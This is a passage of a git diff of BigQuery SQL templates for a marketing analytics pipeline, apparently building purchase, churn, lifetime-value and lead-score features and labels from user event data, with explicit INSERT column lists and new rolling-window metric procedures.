View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS - SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM ( - SELECT - DISTINCT *, - ROW_NUMBER() OVER (PARTITION BY will_purchase ORDER BY RAND()) AS rn - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` ) - WHERE - rn <= ( - SELECT - COUNT(will_purchase) - FROM - `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30` - WHERE - will_purchase = 1) -; + will_purchase, + -- Number of rows per user, per day, per split. Only one row per user, per day, per slip. + ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit + FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` +) +WHERE + row_order_peruser_perday_persplit = 1 +) +WHERE + -- Skipping windows of 30 days, which is the future window size. 
+ MOD(row_order_peruser_persplit-1, 30) = 0; CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_last_window` @@ -2896,193 +1691,7 @@ SELECT DISTINCT ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split, will_purchase ORDER BY feature_date DESC) AS user_row_order --ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` + TABLESAMPLE SYSTEM (1 PERCENT) ) WHERE user_row_order = 1; - - -CREATE OR REPLACE VIEW `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_rare_sales` -(processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase) -OPTIONS( - --expiration_timestamp=TIMESTAMP_ADD(CURRENT_TIMESTAMP(), INTERVAL 48 HOUR), - friendly_name="v_purchase_propensity_training_30_30_rare_sales", - description="View Purchase Propensity Training dataset using 30 days back to predict 15 days ahead. 
View expires after 48h and should run daily.", - labels=[("org_unit", "development")] -) AS -SELECT DISTINCT - processed_timestamp, - data_split, - user_pseudo_id, - user_id, - user_ltv_revenue, - device_category, - device_mobile_brand_name, - device_mobile_model_name, - device_os, - device_language, - device_web_browser, - geo_sub_continent, - geo_country, - geo_region, - geo_city, - geo_metro, - last_traffic_source_medium, - last_traffic_source_name, - last_traffic_source_source, - first_traffic_source_medium, - first_traffic_source_name, - first_traffic_source_source, - has_signed_in_with_user_id, - active_users_past_1_day, - active_users_past_2_day, - active_users_past_3_day, - active_users_past_4_day, - active_users_past_5_day, - active_users_past_6_day, - active_users_past_7_day, - active_users_past_8_14_day, - active_users_past_15_30_day, - purchases_past_1_day, - purchases_past_2_day, - purchases_past_3_day, - purchases_past_4_day, - purchases_past_5_day, - purchases_past_6_day, - purchases_past_7_day, - purchases_past_8_14_day, - purchases_past_15_30_day, - visits_past_1_day, - visits_past_2_day, - visits_past_3_day, - visits_past_4_day, - visits_past_5_day, - visits_past_6_day, - visits_past_7_day, - visits_past_8_14_day, - visits_past_15_30_day, - view_items_past_1_day, - view_items_past_2_day, - view_items_past_3_day, - view_items_past_4_day, - view_items_past_5_day, - view_items_past_6_day, - view_items_past_7_day, - view_items_past_8_14_day, - view_items_past_15_30_day, - add_to_carts_past_1_day, - add_to_carts_past_2_day, - add_to_carts_past_3_day, - add_to_carts_past_4_day, - add_to_carts_past_5_day, - add_to_carts_past_6_day, - add_to_carts_past_7_day, - add_to_carts_past_8_14_day, - add_to_carts_past_15_30_day, - checkouts_past_1_day, - checkouts_past_2_day, - checkouts_past_3_day, - checkouts_past_4_day, - checkouts_past_5_day, - checkouts_past_6_day, - checkouts_past_7_day, - checkouts_past_8_14_day, - checkouts_past_15_30_day, - will_purchase - FROM - (SELECT DISTINCT - * - FROM `{{project_id}}.{{dataset}}.v_purchase_propensity_training_30_30_last_window` - ) - UNION ALL - ( - SELECT DISTINCT - * EXCEPT(user_row_order, feature_date) - FROM( - SELECT DISTINCT - *, - ROW_NUMBER() OVER (PARTITION BY user_pseudo_id, data_split ORDER BY feature_date DESC) AS user_row_order - FROM `{{project_id}}.{{dataset}}.purchase_propensity_training_30_30` - WHERE will_purchase = 1 - ) - WHERE - user_row_order = 1 - LIMIT 100 - ) -; diff --git a/sql/procedure/user_rolling_window_lead_metrics.sqlx b/sql/procedure/user_rolling_window_lead_metrics.sqlx new file mode 100644 index 00000000..26e25155 --- /dev/null +++ b/sql/procedure/user_rolling_window_lead_metrics.sqlx @@ -0,0 +1,129 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. 
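-- For illustration: the purchase propensity training views above first keep a single row per
-- user, per day and per split (WHERE row_order_peruser_perday_persplit = 1), and then sample
-- every 30th remaining day per user with MOD(row_order_peruser_persplit - 1, 30) = 0, so that
-- training examples for the same user do not overlap within the 30-day future window.
-- A minimal, self-contained sketch of that two-step filter; `my_training_table` is a
-- hypothetical stand-in, and the exact partitioning of row_order_peruser_persplit in the
-- repository may differ.
SELECT * EXCEPT(row_order_peruser_persplit)
FROM (
  SELECT
    user_pseudo_id,
    feature_date,
    data_split,
    will_purchase,
    -- Order each user's surviving days so every 30th one can be kept.
    ROW_NUMBER() OVER (
      PARTITION BY user_pseudo_id, data_split, will_purchase
      ORDER BY feature_date DESC) AS row_order_peruser_persplit
  FROM (
    SELECT
      *,
      -- One row per user, per day, per split.
      ROW_NUMBER() OVER (
        PARTITION BY user_pseudo_id, feature_date, data_split, will_purchase
        ORDER BY feature_date DESC) AS row_order_peruser_perday_persplit
    FROM my_training_table
  )
  WHERE row_order_peruser_perday_persplit = 1
)
-- Keep days 1, 31, 61, ... per user: non-overlapping 30-day windows.
WHERE MOD(row_order_peruser_persplit - 1, 30) = 0;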
+ +-- Setting procedure to lookback from the day before `input_date` until the day before `end_date` +-- Subtract one day from `input_date` +SET input_date = DATE_SUB(input_date, INTERVAL 1 DAY); +-- Subtract one day from `end_date` +SET end_date = DATE_SUB(end_date, INTERVAL 1 DAY); + +{% for feature in short_list_features %} +-- Past User metrics: 1-day {{feature.feature_name}} events per user, 2-5-day {{feature.feature_name}} events per user +-- Create a temporary table `rolling_{{feature.feature_name}}_past_days` to store the rolling {{feature.feature_name}} events count for each user +CREATE OR REPLACE TEMP TABLE rolling_{{feature.feature_name}}_past_days AS ( +SELECT + -- User's unique identifier + user_pseudo_id, + -- Calculate the number of {{feature.feature_name}} made in the past 1 day + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 1 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_1_day, + -- Calculate the number of {{feature.feature_name}} made in the past 2 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 2 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_2_day, + -- Calculate the number of {{feature.feature_name}} made in the past 3 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 3 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_3_day, + -- Calculate the number of {{feature.feature_name}} made in the past 4 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 4 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_4_day, + -- Calculate the number of {{feature.feature_name}} made in the past 5 days + MAX(COUNT(DISTINCT CASE WHEN DATE_DIFF(input_date, event_date, DAY) = 5 THEN event_timestamp END)) OVER(PARTITION BY user_pseudo_id) AS {{feature.feature_name}}_past_5_day +FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E +-- Filter events within the defined date range +WHERE event_date BETWEEN end_date AND input_date +-- Filter for {{feature.feature_name}} events +AND event_name='{{feature.feature_name}}' +-- Ensure valid session ID +AND ga_session_id IS NOT NULL +-- Group the results by user pseudo ID +GROUP BY user_pseudo_id +); + +{% endfor %} + +-- All users in the platform +CREATE OR REPLACE TEMP TABLE events_users_days as ( + SELECT DISTINCT + -- User pseudo ID + Users.user_pseudo_id, + -- distinct event date + Days.event_date as event_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + -- 'Days' is an alias for a temporary table containing distinct event dates + CROSS JOIN + (SELECT DISTINCT event_date FROM `{{mds_project_id}}.{{mds_dataset}}.event`) Days + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON Users.device_type_id = D.device_type_id + -- Exclude events without a valid session ID + WHERE Users.ga_session_id IS NOT NULL + -- Exclude events without a valid device operating system + AND D.device_os IS NOT NULL + -- Filter events within the defined date range + AND Days.event_date BETWEEN end_date AND input_date) +; + +-- Create a temporary table to store data for the target table +CREATE OR REPLACE TEMP TABLE DataForTargetTable AS +SELECT DISTINCT + -- Current timestamp + CURRENT_TIMESTAMP() AS processed_timestamp, + -- Feature date + input_date AS feature_date, + -- User pseudo ID + EUD.user_pseudo_id{% for feature in short_list_features %}, + 
COALESCE({{feature.feature_name}}_past_1_day,0) AS {{feature.feature_name}}_past_1_day, + COALESCE({{feature.feature_name}}_past_2_day,0) AS {{feature.feature_name}}_past_2_day, + COALESCE({{feature.feature_name}}_past_3_day,0) AS {{feature.feature_name}}_past_3_day, + COALESCE({{feature.feature_name}}_past_4_day,0) AS {{feature.feature_name}}_past_4_day, + COALESCE({{feature.feature_name}}_past_5_day,0) AS {{feature.feature_name}}_past_5_day{% endfor %} + FROM events_users_days AS EUD{% for feature in short_list_features %} + FULL OUTER JOIN rolling_{{feature.feature_name}}_past_days AS {{feature.feature_name}} + ON EUD.user_pseudo_id = {{feature.feature_name}}.user_pseudo_id{% endfor %} + -- Exclude rows without a valid user pseudo ID + WHERE EUD.user_pseudo_id IS NOT NULL + ; + +-- Merge data into the target table +MERGE `{{project_id}}.{{dataset}}.{{insert_table}}` I +USING DataForTargetTable T +ON I.feature_date = T.feature_date + AND I.user_pseudo_id = T.user_pseudo_id +WHEN MATCHED THEN + UPDATE SET + -- Update the processed timestamp and rolling window features + I.processed_timestamp = T.processed_timestamp{% for feature in short_list_features %}, + I.{{feature.feature_name}}_past_1_day = T.{{feature.feature_name}}_past_1_day, + I.{{feature.feature_name}}_past_2_day = T.{{feature.feature_name}}_past_2_day, + I.{{feature.feature_name}}_past_3_day = T.{{feature.feature_name}}_past_3_day, + I.{{feature.feature_name}}_past_4_day = T.{{feature.feature_name}}_past_4_day, + I.{{feature.feature_name}}_past_5_day = T.{{feature.feature_name}}_past_5_day{% endfor %} +WHEN NOT MATCHED THEN + INSERT + (processed_timestamp, + feature_date, + user_pseudo_id{% for feature in short_list_features %}, + {{feature.feature_name}}_past_1_day, + {{feature.feature_name}}_past_2_day, + {{feature.feature_name}}_past_3_day, + {{feature.feature_name}}_past_4_day, + {{feature.feature_name}}_past_5_day{% endfor %}) + VALUES + (T.processed_timestamp, + T.feature_date, + T.user_pseudo_id{% for feature in short_list_features %}, + T.{{feature.feature_name}}_past_1_day, + T.{{feature.feature_name}}_past_2_day, + T.{{feature.feature_name}}_past_3_day, + T.{{feature.feature_name}}_past_4_day, + T.{{feature.feature_name}}_past_5_day{% endfor %}) +; + +-- Set a variable to track the number of rows added +SET rows_added = (SELECT COUNT(DISTINCT user_pseudo_id) FROM `{{project_id}}.{{dataset}}.{{insert_table}}`); diff --git a/sql/query/create_gemini_model.sqlx b/sql/query/create_gemini_model.sqlx index 84612d8f..4e365c4a 100644 --- a/sql/query/create_gemini_model.sqlx +++ b/sql/query/create_gemini_model.sqlx @@ -18,6 +18,6 @@ -- Your supervised tuning computations also occur in the europe-west4 region, because that's where TPU resources are located. 
-- Create a {{endpoint_name}} model using a remote connection to {{region}}.{{connection_name}} -CREATE OR REPLACE MODEL `{{project_id}}.{{dataset}}.{{model_name}}` +CREATE MODEL IF NOT EXISTS `{{project_id}}.{{dataset}}.{{model_name}}` REMOTE WITH CONNECTION `{{project_id}}.{{region}}.{{connection_name}}` OPTIONS (ENDPOINT = '{{endpoint_name}}'); \ No newline at end of file diff --git a/sql/query/invoke_backfill_churn_propensity_label.sqlx b/sql/query/invoke_backfill_churn_propensity_label.sqlx index 4cbe77ac..9dd41da7 100644 --- a/sql/query/invoke_backfill_churn_propensity_label.sqlx +++ b/sql/query/invoke_backfill_churn_propensity_label.sqlx @@ -119,7 +119,13 @@ GROUP BY ); -- Insert data into the target table, combining user information with churn and bounce status -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + churned, + bounced +) SELECT DISTINCT -- Current timestamp as the processing timestamp CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx b/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx index 27ea59d0..569e5db5 100644 --- a/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx +++ b/sql/query/invoke_backfill_customer_lifetime_value_label.sqlx @@ -109,7 +109,14 @@ CREATE OR REPLACE TEMP TABLE future_revenue_per_user AS ( ); -- Insert data into the target table -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + pltv_revenue_30_days, + pltv_revenue_90_days, + pltv_revenue_180_days +) SELECT DISTINCT -- Current timestamp of the processing CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_lead_score_propensity_label.sqlx b/sql/query/invoke_backfill_lead_score_propensity_label.sqlx new file mode 100644 index 00000000..eba85784 --- /dev/null +++ b/sql/query/invoke_backfill_lead_score_propensity_label.sqlx @@ -0,0 +1,116 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. 
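-- For illustration: the backfill queries in this change now name the target columns explicitly
-- instead of relying on `INSERT INTO t SELECT ...`, which binds values by position and breaks
-- silently if the destination table's column order ever changes. A minimal sketch of the same
-- pattern; `sample_labels` and its columns are hypothetical, not objects created by this
-- repository.
CREATE TEMP TABLE sample_labels (
  processed_timestamp TIMESTAMP,
  feature_date DATE,
  user_pseudo_id STRING,
  churned INT64
);

-- With an explicit column list the statement keeps working even if columns are later
-- reordered or appended to `sample_labels`.
INSERT INTO sample_labels (processed_timestamp, feature_date, user_pseudo_id, churned)
SELECT CURRENT_TIMESTAMP(), DATE '2024-01-01', 'user_a', 1;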
+ +-- Declares a variable to store the maximum date for analysis +DECLARE max_date DATE; +-- Declares a variable to store the minimum date for analysis +DECLARE min_date DATE; +-- Sets the max_date variable to the latest event_date minus a specified number of days ({{interval_max_date}}) from the 'event' table +SET max_date = (SELECT DATE_SUB(MAX(event_date), INTERVAL {{interval_max_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +-- Sets the min_date variable to the earliest event_date plus a specified number of days ({{interval_min_date}}) from the 'event' table +SET min_date = (SELECT DATE_ADD(MIN(event_date), INTERVAL {{interval_min_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + +-- If min_date > maximum event_date OR max_date < minimum event_date, then set min_date for the max event_date and set max_date for the min event_date +IF min_date >= (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR max_date <= (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date >= max_date THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- This code block acts as a safeguard to ensure that the min_date and max_date used for further analysis are always within the bounds of the actual data available in the table. +-- It prevents situations where calculations might mistakenly consider dates beyond the real data range, which could lead to errors or misleading results. +IF max_date > (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) OR min_date < (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`) THEN + SET min_date = (SELECT MIN(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); + SET max_date = (SELECT MAX(event_date) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +END IF; + +-- Creates a temporary table called dates_interval to store distinct event dates and their corresponding end dates +CREATE OR REPLACE TEMP TABLE dates_interval as ( + SELECT DISTINCT + -- Selects the distinct event_date and assigns it to the column input_date + event_date as input_date, + -- Calculates the end date by adding a specified number of days ({{interval_end_date}}) to the input_date + DATE_ADD(event_date, INTERVAL {{interval_end_date}} DAY) as end_date + FROM `{{mds_project_id}}.{{mds_dataset}}.event` + -- Filters the events to include only those within the defined date range (between min_date and max_date) + WHERE event_date BETWEEN min_date AND max_date + ORDER BY input_date DESC +); + +-- All users in the platform +-- Creates a temporary table called all_users_possible_{{target_event}}s to store user {{target_event}} data +CREATE OR REPLACE TEMP TABLE all_users_possible_{{target_event}}s as ( + SELECT DISTINCT + -- Selects the user_pseudo_id from the 'event' table and assigns it to the column user_pseudo_id + Users.user_pseudo_id, + -- Selects the event_date from the date array generated using GENERATE_DATE_ARRAY and assigns it to the column feature_date + DI.event_date as feature_date, + -- Creates a series of columns ({{target_event}}_day_1) and initializes them with NULL values + -- These columns will be populated later with {{target_event}} data for specific days + NULL as {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` Users + -- Performs a cross join with a subquery that generates a date array using 
GENERATE_DATE_ARRAY + -- The date array includes dates from min_date to max_date with a 1-day interval + CROSS JOIN (SELECT event_date FROM UNNEST(GENERATE_DATE_ARRAY(min_date, max_date, INTERVAL 1 DAY)) as event_date) as DI + -- Filters the data to include events where event_name is '{{target_event}}' + WHERE LOWER(Users.event_name) IN ('{{target_event}}') + AND Users.ga_session_id IS NOT NULL + ); + +-- Creates a temporary table called future_{{target_event}}s_per_user to store user {{target_event}} data in the future +-- Future User metrics: 1-7-day future {{target_event}}s per user, 1-day future {{target_event}}s per user +CREATE OR REPLACE TEMP TABLE future_{{target_event}}s_per_user AS ( + SELECT + -- Selects user_pseudo_id from the event table and assigns it to column user_pseudo_id + user_pseudo_id, + -- Selects input_date from the dates_interval table and assigns it to column feature_date + input_date as feature_date, + -- This calculation is performed over a window partitioned by user_pseudo_id and input_date + -- Repeats the above logic for different day offsets (1) to calculate future {{target_event}} counts for different days + MAX(COUNT(DISTINCT CASE DATE_DIFF(event_date, input_date, DAY) = 1 WHEN TRUE THEN ecommerce.transaction_id END)) OVER(PARTITION BY user_pseudo_id, input_date) AS {{target_event}}_day_1 + FROM `{{mds_project_id}}.{{mds_dataset}}.event` as E + INNER JOIN `{{mds_project_id}}.{{mds_dataset}}.device` as D + ON E.device_type_id = D.device_type_id + CROSS JOIN dates_interval as DI + -- Filters events to be within the date range defined by input_date and end_date from dates_interval + WHERE E.event_date BETWEEN DI.input_date AND DI.end_date + AND LOWER(E.event_name) IN ('{{target_event}}') + AND E.ga_session_id IS NOT NULL + AND D.device_os IS NOT NULL + -- Groups the result by user_pseudo_id and feature_date + GROUP BY user_pseudo_id, feature_date +); + +-- Inserts data into the target table +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + {{target_event}}_day_1 +) +SELECT DISTINCT + -- Selects the current timestamp and assigns it to the column processed_timestamp + CURRENT_TIMESTAMP() AS processed_timestamp, + -- Selects the feature_date from the all_users_possible_{{target_event}}s table and assigns it to the column feature_date + A.feature_date, + -- Selects the user_pseudo_id from the all_users_possible_{{target_event}}s table and assigns it to the column user_pseudo_id + A.user_pseudo_id, + -- Uses the LEAST function to get the minimum value between the coalesced value of {{target_event}}_day_1 and 1 + -- COALESCE is used to handle null values, replacing them with 0 + -- This pattern is repeated for {{target_event}}_day_1 to populate the respective columns + LEAST(COALESCE(B.{{target_event}}_day_1, 0), 1) AS {{target_event}}_day_1 +FROM all_users_possible_{{target_event}}s AS A +-- Performs a left join with the future_{{target_event}}s_per_user table (aliased as B) using user_pseudo_id and feature_date +LEFT JOIN future_{{target_event}}s_per_user AS B +ON B.user_pseudo_id = A.user_pseudo_id AND B.feature_date = A.feature_date +; \ No newline at end of file diff --git a/sql/query/invoke_backfill_purchase_propensity_label.sqlx b/sql/query/invoke_backfill_purchase_propensity_label.sqlx index a2c8bee0..b062dc58 100644 --- a/sql/query/invoke_backfill_purchase_propensity_label.sqlx +++ b/sql/query/invoke_backfill_purchase_propensity_label.sqlx @@ -125,7 +125,26 @@ CREATE OR REPLACE TEMP 
TABLE future_purchases_per_user AS ( ); -- Inserts data into the target table -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + purchase_day_1, + purchase_day_2, + purchase_day_3, + purchase_day_4, + purchase_day_5, + purchase_day_6, + purchase_day_7, + purchase_day_8, + purchase_day_9, + purchase_day_10, + purchase_day_11, + purchase_day_12, + purchase_day_13, + purchase_day_14, + purchase_day_15_30 +) SELECT DISTINCT -- Selects the current timestamp and assigns it to the column processed_timestamp CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_dimensions.sqlx b/sql/query/invoke_backfill_user_dimensions.sqlx index c27dd299..6c81b412 100644 --- a/sql/query/invoke_backfill_user_dimensions.sqlx +++ b/sql/query/invoke_backfill_user_dimensions.sqlx @@ -122,7 +122,31 @@ CREATE OR REPLACE TEMP TABLE events_users as ( ; -- Inserting aggregated user data into the target table. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id +) SELECT DISTINCT -- Timestamp of the data processing CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx b/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx index 4001878f..b05611e0 100644 --- a/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx +++ b/sql/query/invoke_backfill_user_lifetime_dimensions.sqlx @@ -137,7 +137,31 @@ CREATE OR REPLACE TEMP TABLE events_users as ( -- This code block inserts data into the specified table, combining information from the "events_users" table -- and the "user_dimensions_event_session_scoped" table. -- It aggregates user-level features for each user and date. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` ( + processed_timestamp, + feature_date, + user_pseudo_id, + user_id, + user_ltv_revenue, + device_category, + device_mobile_brand_name, + device_mobile_model_name, + device_os, + device_language, + device_web_browser, + geo_sub_continent, + geo_country, + geo_region, + geo_city, + geo_metro, + last_traffic_source_medium, + last_traffic_source_name, + last_traffic_source_source, + first_traffic_source_medium, + first_traffic_source_name, + first_traffic_source_source, + has_signed_in_with_user_id +) SELECT DISTINCT -- The current timestamp. CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_lookback_metrics.sqlx b/sql/query/invoke_backfill_user_lookback_metrics.sqlx index 25e3566b..37bd4563 100644 --- a/sql/query/invoke_backfill_user_lookback_metrics.sqlx +++ b/sql/query/invoke_backfill_user_lookback_metrics.sqlx @@ -230,7 +230,25 @@ AND D.device_os IS NOT NULL -- This code is part of a larger process for building a machine learning model that predicts -- user behavior based on their past activity. 
The features generated by this code can be used -- as input to the model, helping it learn patterns and make predictions. -INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}` +INSERT INTO `{{project_id}}.{{dataset}}.{{insert_table}}`Β ( + processed_timestamp, + feature_date, + user_pseudo_id, + active_users_past_1_7_day, + active_users_past_8_14_day, + purchases_past_1_7_day, + purchases_past_8_14_day, + visits_past_1_7_day, + visits_past_8_14_day, + view_items_past_1_7_day, + view_items_past_8_14_day, + add_to_carts_past_1_7_day, + add_to_carts_past_8_14_day, + checkouts_past_1_7_day, + checkouts_past_8_14_day, + ltv_revenue_past_1_7_day, + ltv_revenue_past_7_15_day +) SELECT DISTINCT -- Timestamp indicating when the data was processed CURRENT_TIMESTAMP() AS processed_timestamp, diff --git a/sql/query/invoke_backfill_user_rolling_window_lead_metrics.sqlx b/sql/query/invoke_backfill_user_rolling_window_lead_metrics.sqlx new file mode 100644 index 00000000..b8b364cc --- /dev/null +++ b/sql/query/invoke_backfill_user_rolling_window_lead_metrics.sqlx @@ -0,0 +1,127 @@ +-- Copyright 2023 Google LLC +-- +-- Licensed under the Apache License, Version 2.0 (the "License"); +-- you may not use this file except in compliance with the License. +-- You may obtain a copy of the License at +-- +-- http://www.apache.org/licenses/LICENSE-2.0 +-- +-- Unless required by applicable law or agreed to in writing, software +-- distributed under the License is distributed on an "AS IS" BASIS, +-- WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +-- See the License for the specific language governing permissions and +-- limitations under the License. + +-- This SQL code defines a series of temporary tables to calculate and store user engagement metrics based on +-- rolling window aggregations. These tables are then used to populate a target table with daily user engagement features. + +DECLARE max_date DATE; +DECLARE min_date DATE; +-- Sets max_date to the latest event_date from the event table, minus an offset specified by the interval_max_date +SET max_date = (SELECT DATE_SUB(MAX(event_date), INTERVAL {{interval_max_date}} DAY) FROM `{{mds_project_id}}.{{mds_dataset}}.event`); +-- Sets min_date to the earliest event_date from the event table, plus an offset specified by the 